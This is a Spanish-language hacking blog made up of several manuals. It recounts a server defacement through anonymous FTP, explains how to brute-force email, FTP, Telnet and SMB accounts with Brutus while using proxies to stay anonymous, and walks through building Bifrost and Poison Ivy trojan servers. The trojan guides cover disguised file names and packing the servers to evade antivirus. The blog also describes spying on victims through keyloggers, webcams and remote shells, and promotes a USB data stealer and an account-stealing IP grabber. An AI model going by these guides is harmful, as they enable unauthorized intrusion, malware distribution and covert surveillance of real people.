Este método aunque parezca una chorrada… te juro que no lo es.
Te voy a narrar algo que paso por diciembre del 96 a un amigo hacker….
…a ver… voy a hackear un servidor de Internet…
este esta bien. Son novatos. Mucho mejor, seguro que tendrán
un huevo de fallos. ¿Tendrán ftp anonimo?
Login: anonymous
passworD: anonymous
yeah! hay ftp anónimo con programitas shareware jeje….
mmmm… no está el directorio etc/ ….
vamos a ver si deja cambiar de directorio. igual está oculto.
-chg directory
cambiar a /etc
no existe. igual lo tienen protegido.
cambiar a /administrador
no existe.
cambiar a /administrator
SI EXISTE… hehehe
que hay en este directorio… etc/ bin/ mail/ (joder!) etc…..
joder! si están las páginas web aqui!
y el correo electrónico y todo!
ah!. Soy un hacker no un criminal.
A pesar de poder abrirse cuenta de acceso a internet, leer correos electrónicos
etc… solo cambió la página web.
el servidor en cuestión es conexión global internet (http://www.cglobal.com)
aunque el nombre cambió durante un día por “conexión mamadón internet”
hehehe… ya no tienen ftp anonimo. (mira a ver). es que los hay capullos.
Por probar que no quede. A probar todo lo que se te ocurra.
Si el servidor es de WinNT mejor que mejor! más rápido caerá.
probar con directorios ocultos tipo:
/root
/pub
/bin
/etc
/administrador
/administrator
/lo que se te ocurra.
Hay otros métodos, los más eficaces (y más complicados) por Telnet, etc.
January 20th, 2008
Categories: manuales | Autor: admin | Comments: Comments Off |
Hola a todos voy a hablaros de un programa con el que deberiais familiariza-ros, ya q resulta de mucha utilidad en muchas ocasiones.
Podemos definir el Brutus como un crackeador de passwords remoto on-line, es rapido admite hasta 60 conexiones simultaneas ( cuidado con esto que puedes tirar abajo algun servicio ), puede llegar 2500 palabras por segundo << con dialup ni de coña, no es bueno excederse en esto casi regula las conexiones segun tu linea y la calidad de respuesta que te de el servidor.
Haber empecemos con lo q interesa, lo primero que haremos sera descargar el brutus Aqui bien estas son sus caracterisitic as:
Y a parte podemos configurarlo para petar un servicio que configuremos noso-tros mismos como smtp, nntpd etc entre sus caracteristica s cabe destacar la posibilidad de usar un proxy sock(v4) sock(v4.1) y sock(5), puedes encontrar proxies en http://www.atomintersoft.com/products/alive-proxy/proxy-list/ a veces muchos servicios
Tambien dispone de un generador de diccionarios bastante completo, en Tools >> Wordlist Generator, veamos las opciones que tiene:
Convert list (LF>CRLF) – convierte una lista de palabras en formato unix a formato dos cambiando los saltos de linea,para usarlo selecionaremos la lis-ta en estilo unix en “input list” y en “output list” el nombre de la lista de salida que queremos.
Only word length – con esta opcion lo q hacemos es coger de una lista de pa-labras las quekeramos en funcion de su longitud definiremos el numero de ca-acteres en word lenght y selecionaremos la lista que keremos en input list y la de salida en output.
Remove duplicates – esta opcion lo q hace es copiar la lista de entrada a la q keramos eliminando las palabras duplicadas.
Permutations – esta opcion realiza cualquier tipo de permutaciones sobre una determinada lista de palabras añadiendo mayusculas minusculas invirtiendo la palabra… solo es usar la permutacion q mas nos interese.
Create new list – con esta opcion ya no necesitamos una lista de entrada simplemente crearemos una con los parametros que queramos donde definiremos el numero de caracteres y las permutaciones como en el apartado anterior ademas tenemos la opcion de seed word q lo q hace es q nosotros añadimos unas palabras y vea la lista utilizando esos caracteres.
Create new list for user – aki crearemos una nueva lista en la ke ademas podremos poner un nombre de usuario del cual partira el programa
Create new list for users – esta es igual que la anterior pero podemos selecionar una lista q tengamos con usuarios en input list para q cree la lista en base a esos users.
Podemos utilizar varios metodos de autentificacio n tanto para el modo de password como para el modo de usuario:
En Authentication Options: El modo de identificacion del usuario siempre es el mismo para todos los metodos de ataque que explicaremos detenidamente, hay dos modos como podras observar “Use Username” el cual usa un diccionario y va probando uno a uno, o “Single User” que sirve para usar un solo login, el de la victima y con ese login probara todos los pass mediante los metodos que vamos a ver ahora.
NOTA: He visto el diccionario de users.txt es pequeñito aqui os lo planto Admin
administrator
test
guest
root
backup
Bueno respecto a servicios ftp estos nombres de usuarios y alguno mas se les deniega el acceso como login , bueno esto esta en /etc/ftpusers en un proftp, pero asi suele venir en muchos servicios ftp segun los instalas
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody
Este archivo puede modificarse,simplemente con añadir + usuarios a quien deniegen el acceso y todo depende de quien lo administre, bueno ahora veamos lo distintos modos de ataque.
Para usar distintos metodos de ataque solo tienes que seleccionar en “Pass Mode” y coger el ataque que mas te convenga Word list “Ataque por diccionario”:No pienses que estamos hablando de el larouse, si no de una simple lista de palabras, que nos pueden ahorrar trabajo a diferencia de otros metodos como el brute force ,. para seleccionar el diccionario solo tienes que ir a Browse y escogerlo Combo list: Para este tipo de ataque tambien se necesita un diccionario, si la diferencia con el de arriba es que combinan las palabras del diccionario separadas por “:” “_”,
ej guest:password ver example-combo.txt
Brute force “Ataque por fuerza bruta”,este ataque trata de sacar el pass mediante combinaciones de “letras, numeros, caracteres especiales” esto puedes personalizarlo he incluso limitar el numero de caracteres, cuando seleccionas este metodo aparece el boton “Range” cuando calcas este se abre un menu “Brute Force Generation”, en el cual hay varias opciones:
Digits Only: Solo numeros
Lowercase Alpha: Solo minusculas
Uppercase Alpha: Solo mayusculas
Mixed Alpha: combinacion de mayusculas y minusculas
Alphanumeric: abcd….z
Full Keyspace: Prueba con espacios por ej: Pepe 12
Custom Range: Ahi puedes meter los caracteres que quieras
Min Length: Seleccionas el numer o de caracteres minimo que podra tener elpass
Max Length : Aqui seleccionas el numero de caracteres maximo que comprobara
2. Elección de servicio a atacar
Las 2 primeras opciones HTTP se utilizan para entrar en esas paginas que al intentar acceder nos sale una ventana pidiendo login y pass utilizaremos uno u otro dependiendo del tipo de autentificacio n que rekiera dicha web lo comprobaremos probando con ambos tipos., las HTTP “CGI application authentication” son las que usan programas CGIs, para autentificarse, ( podeis mirar el articulo de Problemas con los CGIs de NORTH que comenta un poco que son los cgis etc). Para utilizarlos no hay mas que poner en target por ej: www.victima.co m o victima.com y seleccionar en autentificatio ns options use username y pass mode el metodo ke mas nos convenga como norma general usaremos en este tipo de webs un dicionario del idioma en el ke este dicha web.
Esto es util sobre todo para esas webs xxx en las q rekieren ser socio para entrar claro esta q no sacaremos nada util de ellas unke estareis un rato entretenidos xDD.
POP3 bueno esto ya es algo mas interesante usaremos esta opcion para petar cuentas de correo de servidores q tenga pop3 activo. Selecionamos POP3 y en target escribimos POP3.victima.c om por ejemplo:
(pop3.terra.es) o en su caso la ip, en autentificatio n options marcamos use username y single user, y escribiremos en la casilla de userid victima.terra. es si la cuenta de la victima es (victima@terra.es). Lo escribiremos con punto(.) no arroba(@) y de nuevo usaremos el modo de pass q mas nos interese ya sea dicc, combo o brute force.
Bueno pasemos al ftp aunque como vereis la rutina es parecida en todos los tipos rekieren pequeñas variaciones en cada uno de ellos. En este caso nos convendra tener un nombre de usuario del que trataremos de sacar el pass aun q tambien podemos buscar nombres de usuario al azar, lo cual logicamente nos llevara mucho tiempo. Selecionamos type ftp y si tenemos un nombre de usuario marcaremos use username y single user escribiremos el nombre de usuario por ej: pardillo y selecionaremos el metodo dicc,combo… si no tenemos nombre de usuario selecionamos un diccionario y marcamos solo la casilla useusername.
TELNET – pues es facil lo haremos igual que con un ftp pero selecionando type telnet claro esta .
SMB (netBIOS) bueno aki tenemos otro servicio del cual tb podemos sacar provecho usando el brutus si es q esta protegido, cuanta gente piensa que este servicio lo dan solo maquinas con win lo habre oido mil veces, “na tio es un win tiene el 139 abierto” ,cuando hablamos de SMB”Server Message Block “SMB es un protocolo idea de IBM mientras desarrollaban un sistema basico de E/S para LANS, que luego se llamo NetBIOS, sobre el que luego IBM implemento una interfad mejorada de usuario, llamada NetBEUI. NetBIOS se puede transportar sobre diferentes protocolos de red: NetBEUI,IPX/SPX y TCP/IP, etc. tb se pueden ofrecer este servicio en otros sistemas unices, OS/2, BeOS etc, la unica cosa q tendremos q tener en cuenta a la hora de realizar nuestro atake, en target escribimos la ip de la victima selecionamos type SMB(netBIOS) y ahora en SMB options si se trata de una makina NT escribiremos el nombre del dominio si es solo un pc con win2 9x no marcaremos esta opcion, a continuacion en autentificacio n options ya sabeis selecionaremos use username y el modo de pass q mas nos convenga.
NETBUS – he aki otra utilidad por si olvidamos el pass de alguna victima de netbus o simplemente queremos entrar en alguna que hemos encontrao y esta protegida con pass. Si conoceis este troyano sabreis que cuando lo proteges con pass para entrar solo se rekiere el pass no el login, por eso al seleccionar type netbus no podemos selecionar en autentificatio ns options la opcion de use username o single user si no q solo podemos selecionar la opcion de pass (dicc, combo list …) pues eso haremos lo cual no tiene mayor complicacion.
Ya hemos visto los types q trae el brutus de serie pero no nos vamos a kedar ahi, tb podemos crear nuevos types es decir preparar el brutus para q se conecte a un determinado servicio usando unas determinadanas instruciones q pondremos en el archivo q hagamos.
Ahora os voy a poner un ejemplo de como preparar nuevos types vamos a ver uno para (smtp_verificac ion_de_usuario ), en la web oficial podeis encontrar alguno, te preguntaras como se hacen pues simplemente viendo como verifica el servicio el nombre del usuario y la pass, o en algunos casos solo las pass, para ello puedes ayudarte un sniffer, netcat o cualquier cliente de telnet ya hablaremos de estas utilidades o utilidades parecidas en siguientes ezines.
ara utilizar este codigo crearemos un archivo bad pegaremos en el el codigo y lo guardamos con el nombre q keramos por ej: smtp_b_auth.ba d una vez guar dado solo hay que ir a File > Import Service y seleccionar el type, estos types los puedes configurar en Modify Sequence tb, ahi puedes cambiarlo a tu gusto el metodo o la forma de autentificacio n, tiempo de espera etc , lo guardas con la configuracion que tu quieras en File > Export Service.
Este type lo ke hace es utilizar el comado VRFY “verify” (utilizado para verificar el nombre del usuario) que aunke suele estar desactivado en muchos server debido a que puede revelar informacion tambien otro comando que puede revelar informacion es EXPN (expand) sirve para indicar como se va a resolver la dirección de correo del RCPT que le indiquemos, aunque sea antiguo todavia hay algunos en los que no lo esta desactivado y lo que nos permitira es comprobar utilizando una lista o dicc de users comprobar cuales estan utlizados o no.
Veamos otro para atakar el password en un router CISCO
Veamos otro mas para atakar el metodo de autentificacio n que usan los servidores que proporcionan servicios nntpd “Network News Transfer Protocol”, como podras observar en el codigo usa el puerto 119
3. Para acabar
Quiero recomendaros que siempre q engacheis el brutus a alguna victima no lo hagais directamente recomiendo q useis un proxy, o cualkier otro metodo para mantener el anonimato pq todos los intentos q hagais kedaran logeados.
Bueno creo q no me dejo nada espero que os resulte util esta explicaion y si no pos a joderse xDD.
Podeis reanudar vuestro “ataque”: el brutus guarda el utlimo ataque en autosave.bru, puedes reanudarlo solo con ir a File > Load Session, asi como guardar tus ataques en Save Session con el nombrequequier as.bru.
February 9th, 2008
Categories: manuales | Autor: admin | Comments: Comments Off |
Bueno creo q ya era hora de sacar un artículo relacionado con el hacking, en esta ocasión aprenderemos como hacer el server del troyano Bifrost indetectable para la mayoría de los antibichos incluyendo Norton, Panda, etc.Bien, realmente el procedimiento es bastante sencillo ya que todo el trabajo lo realizan 2 excelente programas! el AsPack
y el NsPack pues bien se los bajan y los instalan.
0k ahora lo que vamos a hacer es abrir nuestro Bifrost 1.1.02 y le damos click en ‘Builder’ para comenzar a construir el server…
Bien despues de haberle dado click en ‘Builder‘ nos aparecerá una pantalla como la de arriba, ahora vamos a introducir
nuestros datos.
Connection: DNS / IP 1: Aquí vamos a poner nuestra IP para q la ‘víctima‘ se conecte a nuestra máquina, pero lo más probable esq contemos con una IP dinámica, entonces deberemos crearnos una cuenta DNS estático (esto hará q nuestro IP se convierta en un DNS y asi es como si tuvieramos IP fija) para eso nos vamos a www.no-ip.com y bueno le damos en ‘Sing-Up Now!‘, después de haber creado su cuenta se van a ‘Hosts/Redirects’ y bueno de ahi a ‘Add’ y agregan pues se crean su DNS. En ‘Port’ y ‘Password’ dejamos los valores que están, bueno pueden cambiarlos da igual
Startup:
Ahi en ‘Registry Key‘ le ponemos el nombre q deseamos q aparezca en el registro, les recomiendo q pongan algo de lo q el usuario no sospeche como Loadqm, Windows Backup u otra cosa q se les ocurra traten de echarle coco . Las otras tres opciones restantes las dejamos palomeadas.
Installation: Filename when installed: Este es el nombre con el q aparecerá el servidor cuando se instale en la máquina remota, les reitero q le pongan un nombre del q nadie pueda sospechar ok?? Assigned Name: Aqui le ponen lo q quieran es el nombre q les aparecerá cuando una persona se conecte a su PC.
Pueden elegir el directorio en el cual se almacenará el server, ‘Windows Directory’ o ‘System Directory’ se los dejo a su elección. La opción de “Melt Server” es para desaparecer el server y la de “Delayed startup’ para retrasar la ejecución
del server, ambas también se las dejo a su libre albedrío, jaja ke mamón
Plugin: Aqui dejamos todas las opciones como están realmente no hay razón para cambiarlas.
Y finalmente dejamos sin palomear las 2 opciones restantes:
‘Autopack Server’ y la de ‘Injection’.
Comenzamos!! Después de haber hecho todo lo anterior le damos en ‘Build’, se creará el archivo server.exe en la carpeta en la q tengamos el bifrost y nosaparecerá una ventana como esta:
Ahora después de q aparezca esta pantalla la dejamos asi o sea no le damos en ‘Aceptar’, con esto nosotros seremos
quienes comprimamos el server.
Abrimos el AsPack ahi en el programa le damos click en ‘Open‘ y buscamos el archivo sever.exe q está en la carpeta del Bifrost, seleccionamos el archivo server.exe, le damos aceptar y automáticamente lo comprimirá. Nos debe aparecer una pantalla como la q se muestra a continuación, también se creará un archivo llamado ‘server.exe.bak‘, ese lo borramos.
Bien cerramos el AsPack y borramos el ’server.exe.bak’.
Ahora abrimos el NsPack, le damos click en ‘Open’ y buscamos el archivo server.exe en la carpeta de Bifrost, lo abrimos, después le damos ‘Compress’ y listo! esta comprimido!, nos aparecerá una pantalla como esta:
Bien ahora cerramos el NsPack, y nos vamos al Bifrost de nuevo, ahora si le damos ‘Aceptar’, nos aparecerá una pantalla
confirmándonos que el servidor se ha creado correctamente!.
Ahora ya tenemos un servidor totalmente indetectable para la mayoría de los antivirus!! Úsalo con moderación y no hagas tonterías con él OK?
Existe otro método también bastante efectivo para hacer indetectable este troyano, usando OllyDBG pero lo dejaremos para otra ocasión.
El poison, se trata de un troyano de conexion inversa. Esta compuesto de
dos partes; un cliente.exe que es mediante el cual creamos el server, y
una vez creado, tendremos un server.exe que es el que tendremos que enviar
a nuestras victimas para que lo ejecuten, y poder controlar remotamente su
pc.
Ahora, tan solo les queda esperar a que descarge… y porsupuesto, no se
olviden de desactivar su antivirus antes para poder bajarlo..
Configuracion del cliente:
Una vez descargado, saquenlo del .zip para trabajar con el (boton
derecho->extract files…) y dejenlo en el escritorio, en mis documentos o
donde quieran…
A continuacion lo abren y ejecutan el Poison 2.3.0 (el icono es el de una
hoja gris) y hacen clic en file -> new client
Les aparecera una nueva ventana en la que deberan poner un password y el
numero de puerto por el que se comunicara el server. Recuerden que es
recomendable abrirlo en su router. Para ello encontran manuales en el
foro.
Hacen clic en start, y ya tendremos configurado el cliente.
Creacion del server.
Ahora, debemos volver a hacer clic en file-> y elegir new server
Les aparecera una nueva ventana, en la cual deberan hacer click en create
profile, y les aparecera un cuadro, donde tendran que escribir un
nombre… por ejemplo txshack… y dan a OK.
Ahora les aparecera lo siguiente:
En la parte DNS/PORT, dan a ADD y les aparecera un cuadro, donde deberan
poner su no-ip.
El puerto debera ser el mismo que colocaron antes (en la configuracion del
cliente) y el password tambien.
A continuacion hagan clic en NEXT.
En esta nueva ventana seleccionan la casilla de activeX Startup y click
en random. (No se les ocurra modificar el valor que sale!!)
Marcan el cuadro de copy file.
En filename, ponen uno que no levante sospecha, como systemc32.exe,
rschost.exe, windbs.exe…..etc
A continuacion, seleccionan la carpeta en la que quieren q se copie el
server, por ejemplo, system folder.
Y por ultimo seleccionan las opcciones que deseen… yo elijo las 3
Hacen clic en NEXT, y les aparecera una nueva ventana.
En process y keylogger mutex dejen el valor que les aparece por defecto.
El proceso donde se inyectara el troyano, viene por defecto el del
messenger… ustedes pueden cambiarlo por otro si quieren. pero cuidado!!
escribanlo bien
A continuacion dan a NEXT y les aparecera una ventana donde podran
cambiear el icono. Lo hacen si kieren ahora… y despues dan clic a
generate (no activen el cuadro de Executed third-party aplication after
build), eligen donde guardarlo y su server ya estara creado.
An visto que facil?? ahora solo les queda indetectabilizarlo y enviarlo para conseguir
victimas…
Opciones de las victimas:
Una vez que tengamos victimas, haciendo doble clic sobre ellas se nos
abrira una ventana, donde podremos activar el keyloger, ver su pantalla,
su cam, sus archivos, su registro….etc
Como veran disponen de varias opciones…. Les voy a explicar mas o menos
para que siven cada una, sin meterme muy a fondo, puesto que es una cosa
sencilla q comprenderan perfectamente cuando las vean.
Information: La informacion del pc victima
Files: aqui tenemos acceso a los archivos de la pc victima. Haciendo click derecho apareceran las siguientes opciones
Refresh Folder: para refrescar la carpeta, sirve por si borramos,
renombramos o hacemos algo….y no aparecen los cambios.
Search: para buscar archivos especificos en la pc victima.
Show Thumbnails: para ver imagenes en miniatura de los iconos…ideal para identificar fotos.
Download: para descargar cualkier archivo
Upload: para subir algun archivo de tu PC al de la victima
Execute: trae dos opciones (excute->normal es decir visible a la victima) y (excute=>hidden invisible a la victima es decir de manera oculta)
Rename: para renombrar archivos o carpetas
Delete: para borrar archivos, programas….
Regedit: acceso al registro de nuestra victima
Processes: muestra los procesos activos en la pc de nuestra vicitima
haciendo click derecho en esta ventana veremos las siguientes opciones:
Refresh: para refrescar la carpeta
Show Modules: para mostrar los modulos q componen el proceso en el
cual estan
Kill Process: para matar el proceso seleccionado
Suspend Process: para suspender el proceso seleccionado
Services: aqui vemos los servicios de la pc victima.
Si hacemos doble clic, apareceran las siguientes opciones.
Refresh: refresca la ventana
Save to file: crea un archivo .txt con la informacion del archivo
Start: para activar el servicio “start” como su nombre indica
Stop: sirve para detener un servicio activo
Edit: para editar el servicio
Install: instalar un servicio
Close: cierra la ventana en la pc victima
Uninstall: desinstalar un servicio
windows: aqui se veran las ventanas que estan abiertas en la pc infectada.
Al hacer click sobr alguna de estas ventanas apareceran estas opciones:
Capture windows: para hacer una captura de dicha ventana
Show: muestra la ventana en la pc victima en caso d q este oculta
Hide: oculta la ventana la ventana en la pc victima
Maximize: maximiza la ventana la ventana en la pc victima
Minimize: minimiza la ventana la ventana en la pc victima
Active ports: te permite poder ver los puertos activos de la victima
remote shell: para abrir la consola de la victima… es lo similar a ir a
inicio -> ejecutar -> cmd
key logger: muestra las teclas q presiona la victima..
screen capture: nos permite ver la pantalla de la victima… incluye las
siguientes opciones:
Stretch:
sirve para ajustar la pantalla de la victima a la ventana.
Mouse:
…para manejar el mouse de la victima y poder clickear en donde queramos.
Keyboard:
…sirve para manejar el teclado de la victima y poder escribir en donde
queramos.
Interval:
…es el intervalo de tiempo en que se toma una y otra captura. Start:
…comienza a capturar pantallazos seguidamente. Single:
…captura un unico pantallazo. Save:
…sirve para guardar la pantalla en un archivo. Si seleccionamos
“Autosave” se guardaran todas las que se capturen. Options:
…sirve para cambiar el tamaño y la calidad de la pantalla.
web cam capture: para ver la cam de la victima… si la tiene
Interval:
…el intervalo de tiempo entre cada captura.
Start:
…comienza a capturar imagenes.
Single:
…captura una unica imagen.
Driver:
…muestra las camaras web instaladas en la PC de la victima. Podemos
seleccionar cualquiera y con el boton “Activate” la activamos. Si no se
encuentra ninguna camara aparecera “No webcam installed!”
Save:
…para guardar la imagen a un archivo. Con “Autosave” se guardaran todas
automaticamente.
Edit id: aqui podremos cambiar el nombre de la victima
Share: para usar el server con otro cliente
DNS/Port: aqui agregaremos la cuenta de no-ip
ID: poner el nombre de la victima q se vera en el nuevo cliente
Password: clave del nuevo cliente
Run in Same Process/New Process: aqui el server se podra ejecutar en el
mismo proceso q estaba anteriormente o en uno nuevo
Privileges: son los privilegios q se le daran al nuevo cliente.
…Stretch:
…igual que en la captura de pantalla, sirve para ajustar la imagen a la
ventana.
…Interval:
…el intervalo de tiempo entre cada captura.
…Start:
…comienza a capturar imagenes.
…Single:
…captura una unica imagen.
…Driver:
…muestra las camaras web instaladas en la PC de la victima. Podemos
seleccionar cualquiera y con el boton “Activate” la activamos. Si no se
encuentra ninguna camara aparecera “No webcam installed!”
…Save:
…para guardar la imagen a un archivo. Con “Autosave” se guardaran todas
automaticamente.
Edit id: aqui podremos cambiar el nombre de la victima
Share: para usar el server con otro cliente
…DNS/Port: aqui agregaremos la cuenta de no-ip
…ID: poner el nombre de la victima q se vera en el nuevo cliente
…Password: clave del nuevo cliente
…Run in Same Process/New Process: aqui el server se podra ejecutar en el
mismo proceso q estaba anteriormente o en uno nuevo
…Privileges: son los privilegios q se le daran al nuevo cliente
…Y aqui concluye el manual…
Espero que les haya quedado claro…
December 18th, 2007
Categories: manuales | Autor: admin | Comments: Comments Off |
El Bifrost se trata de un troyano de conexion inversa, es decir, que el server, una vez alojado en la Pc de nuestra victima, se conecta a nosotros para poder controlar su ordenador.
Una vez descargado, ejecutenlo y les aparecera la pantalla principal del bifrost. En la parte inferior, hagan clic en Settings.
En ports: tienen 3 huecos a rellenar. Esto es el puerto por el que el sever se conectara con vosotros. Se conectara por el puerto que este primero escrito, si por este no puede lo ara por el 2º y sino por el 3º. En caso de que querais poner un solo puerto (por ejemplo el 2000) dejad los otros dos espacion en 0.
En password: introduzcan uno que recuerden.
En Name of extension after upload pondremos addon.dat (es el nombre que tendra la extension)
Despues seleccionaremos tal y como se muestra en la imagen, la casilla, Msn style notification (para que al conectarse las victimas nos lo notifique con una ventana estilo a la del MSN)
Seleccionaremos tambien, Compress file transfer ( que comprimirá los datos de la transferencia de archivos para que se realice más rápido)
Si marcamos la casilla, Check password for incoming connections, nos pedira la contraseña cada vez que halla una coñexion.
Method to determine flag, es la forma que bifrost determina la bandera del pais de la victima. Podemos elegir segun las opciones de region e idioma del PC, o segun el idioma que utilice el teclado.
Una vez echo esto, damos a ok, y ahora cliqueamos en Builder, que es donde crearemos el server.
En Dynamic DNS/IP deveremos ingresar nuestra IP, que sera a la que se conectara nuestro server. Pero existe un problema, que como la IP es dinamica (es decir va cambiando) cuando nuestro server se intente conectar a nuestra PC, cuando esta cambie no lo podra hacer. Por esta razon deveremos crear una no-ip, que lo que hace es redireccionar siempre nuestro server a nuestra IP en caso de que cambie. Es un proceso que tardaremos 10 minutos tan solo, y teneis su manual en esta misma seccion (troyanos y virus)
En este caso la no-ip que emos usado a sido “ejemplo.no-ip.info”. Una vez escrita, damos a Add.
En Password y Port deveremos escrivir lo mismo que en Settings.
Ahora pasemos a la lengueta Installation.
Filename when installed: sera el nombre con el que se instalara nuestro server en el pc de la victima. Es recomendable un nombre que no levante sospecah y que parezca cosa del sistema, como SR032.exe, SIP43.exe etc
Directory to install to: sera el nombre de la carpeta donde se instalara. Esta estara dentro de Systen32, y como en la vez anterior, es aconsejable algo que no levante sospecha como Systcod, RZWIN, 309CF, etc
El resto de las opciones lo mas aconsejable es marcarlas como en la imagen. (Si teneis alguna duda sobre que significa alguna de ellas, no dudeis en postear, os respondere con la mayor brebedad posible)
Bien, ahora pasemos a Stealth.
Como en la vez anterior, os aconsejo marcar las mismas casillas que en la imagen.
Aqui teneis su significado.
Stealth Mode: aqui elegimos el modo de ocultación del server. Si seleccionamos Visible mode,el server se ejecutara de forma visible. Si seleccionamos Cautious mode, el server se ejecutará de forma oculta, pero si no logra injectarse se cerrará para no ser descubierto. Si seleccionamos Agressive mode, el server se ejecutará de forma oculta, y si la inyección falla, intentará conectarse igual.
Set attribute hidden: el server tendrá la opción “Oculto” activada.
Set older file date: el server y su carpeta tendrán su fecha de creación antiguas.
Melt server: cuando el server sea ejecutado, va a desaparecer.
Kernel level unhooking: esta opción sirve para lograr pasar más cantidad de firewalls. Igualmente no es recomendable activarla, ya que esa función todavia es beta y puede presentar problemas.
Delayed Connection: sirve para darle al server un tiempo antes de ejecutarse. Si seleccionamos No delay se ejecutará inmediatamente . Con Delay to next reboot lo hará cuando la PC se reinicie. La tercera opción nos permite establecer un tiempo exacto, con días, minutos y horas, para que el server se ejecute.
Hide Process: intenta ocultar el proceso del server. Esta función requiere que la víctima posea Windows XP y que el usuario sea administrador. Igualmente, es beta y es probable que no funcione correctamente.
La ventana de Miscellanius, es una forma de conectarse a una red TOR, pero por su complejidad y posibles fallos que pueda producir, es aconsejable no marcarla.
Y bien, una vez echo esto, ya tenemos nuextro server configurado. Ahora hacemos clic en Build, y se creara el server.exe en la carpeta donde tengamos el bifrost.
Bien, aora ya tenemos el server creado. Este sera el que deveremos enviar a nustra victima, lo cual es algo mas complicado, pero no dificil. Para que resulte mas facil deveremos hacerlo indetectable para los anti virus y enviarlo por correo o subirlo a lagun servidor para que lo descarguen.
Despues el uso que le den, pues ya depende de cada quien…
Pueden sacar informacion muy personal de la gente, como por ejemplo contraseñas…
… aechivos e imagenes de su pc… etc, asi que tratenlo con respeto hacia la persona… no agan lameradas… y sean buenos xD
Esta aplicacion sirve para robar toda la información que se almacene en un disco extraible, puede ser utilizado en ciberCafes, colegios, universidades, etc.
Cuando se inserta un disco extraible (pendrive, mp3, mp4, camaras, etc.) todos los datos serán copiados de forma silenciosa a una carpeta oculta.
Este programa puede ser muy útil para algunos.
March 4th, 2008
Categories: Otros | Autor: admin | Comments: Comments Off |
Resource Hacker es un programa gratuito diseñado para ayudar a visualizar, modificar, añadir, borrar y extraer recursos en ejecutables de Windows de 32 bits. It incorporates an internal resource script compiler and decompiler and works on all 32 Bit Windows OS. Se hace un script compilador de recursos internos y decompiler y funciona en todos los SO de 32 bits de Windows.
Here are some key features of “Resource Hacker”:Aquí están algunas de las principales características de “Resource Hacker”:
· Viewing Resources: Cursor, Icon, Bitmap, GIF, AVI, and JPG resource images can be viewed. Visualización de Recursos: Cursor, Icon, Bitmap, GIF, AVI, JPG y los recursos se pueden ver las imágenes. WAV and MIDI audio resources can be played. WAV y MIDI recursos de audio se pueden reproducir. Menus, Dialogs, MessageTables, StringTables, Accelerators Menús, Diálogos, MessageTables, StringTables, Aceleradores
, Delphi Forms, and VersionInfo resources can be viewed as decompiled resource scripts. , Las formas de Delphi, y VersionInfo recursos puede considerarse como decompiled recursos scripts. Menus and Dialogs can also be viewed as they would appear in a running application. Menús y Diálogos también puede ser visto como se mostrarían en una aplicación en ejecución.
· Saving Resources: Resources can be saved as image files (*.ico, *.bmp etc), as script files (*.rc), as binary resource files (*.res), or as untyped binary files (*.bin). Ahorro de Recursos: Los recursos se pueden guardar como archivos de imagen (*. ico, *. bmp, etc), como archivos de secuencia de comandos (*. rc), como archivos binarios de recursos (*. res), o como untyped archivos binarios (*. bin ).
· Modifying Resources: Resources can be modified by replacing the resource with a resource located in another file (*.ico, *.bmp, *.res etc) or by using the internal resource script compiler (for menus, dialogs etc). Modificación de los recursos: Los recursos pueden ser modificadas mediante la sustitución de los recursos con los recursos ubicados en otro archivo (*. ico, *. bmp, *. res, etc) o utilizando la secuencia de comandos de compilador de recursos internos (los menús, cuadros de diálogo, etc.) Dialog controls can also be visually moved and/or resized by clicking and dragging the respective dialog controls prior to recompiling with the internal compiler. Diálogo de los controles también puede ser trasladado visualmente y / o cambiar de tamaño haciendo clic y arrastrando el cuadro de diálogo respectivos controles antes de recompilar con el compilador interno.
· Adding Resources: Resources can be added to an application by copying them from external resource files (*.res).Agregando Recursos: Los recursos se pueden agregar a una solicitud de la copia de los ficheros de recursos externos (*. res).
· Deleting Resources: Most compilers add resources into applications which are never used by the application. Borrado de Recursos: La mayoría de los compiladores añadir recursos en aplicaciones que nunca son utilizados por la aplicación.Removing unused resources can reduce an application’s size. Extracción de recursos no puede reducir el tamaño de una solicitud.
Achilles es una herramienta designada para comprobar la seguridad de aplicaciones web. Achilles es un servidor proxy, que actúa como una persona-en-el-medio {man-in-the-middle} durante una sesión de HTTP. Un proxy de HTTP típico pasa paquetes hacia y desde el explorador de web cliente y un servidor de web. Achilles intercepta los datos en una sesión de HTTP en cualquier dirección y le da al usuario la habilidad de alterar los datos antes de ser transmitidos. Por ejemplo, durante una conexión de HTTP SSL normal, un proxy típico pasa la sesión entre el servidor y el cliente y permite a ambos nodos negociar SSL. En contraste, cuando Achilles está en modo de intercepción, Achilles simula ser el servidor y negocia dos sesiones de SSL, una con el explorador de web cliente y otra con el servidor de web. Mientras la información se transmite entre ambos nodos, Achilles descifra los datos y le da al usuario la habilidad de alterar y/o registrar los datos en texto claro antes de su transmisión.
January 17th, 2008
Categories: Otros | Autor: admin | Comments: Comments Off |
Con este util programa podras Robar la IP de tus contactos del Msn, Sólo con enviarle un mensaje o archivo ( foto, animacion…), mientras lo recibe, ejecutas el programa y haces Click en ” Sacar Ip” y te aparecera su ip. Asi de fácil.
Nota: Con este programa te sera muy fácil robar una cuenta hotmail, msn, gmail si usas un troyano o keylogger…
bueno señores, este, para mi es uno de los mejores troyanos que hay, por ser un troyano de conexion inversa, ofrece mejor funcionalidad…
Cita:
Empezado por wikipedia
os troyanos de conexión inversa son los que hacen que el servidor sea el que se conecte al cliente; las ventajas de éste son que traspasan la mayoría de los firewall y pueden ser usados en redes situadas detrás de un router sin problemas.
bueno, comenzamos, para empezar, nuestro lugar de trabajo XD, cuando abrimos el poison ivy, vemos esto…
ID:muestra el nombre que le dimos a la victima.
WAN:muestra la IP de internet de la victima.
LAN:muestra la IP de red de la victima.
Computer: muestra el nombre de la PC de la victima.
User Name: muetra el nombre del usuario activo en la PC de la victima.
Acc. Type:muestra el tipo de sesion que esta activo en la PC de la victima.
OS: muestra el sistema operativo (operating system)(Windows 98, ME, 2000, XP, Linux, etc)
CPU:nos dira la cantidad de megahertz (MHz) que tiene el procesador de la PC de la victima.
RAM:nos dira la cantidad de memoria RAM que posee la PC de la victima.
Version:indica la version del server que tiene instalada la victima.
Ping:indica la velocidad de conexion con la victima. entre mas alto es el numero, mas dificil es la conexion
Port: xxxx :indica el puerto que estamos escuchando.
Connection: xx :indica la cantidad de conexiones que tenemos.
bueno, esto en general de la ventana del poison, ahora damos doble clic sobre la victima, y nos aparecera otra ventana…
primero tenemos la ventana information
aca aparece la informacion sobre la PC y sobre el server que
estamos utilizando…
luego tenemos en Manager, Files…
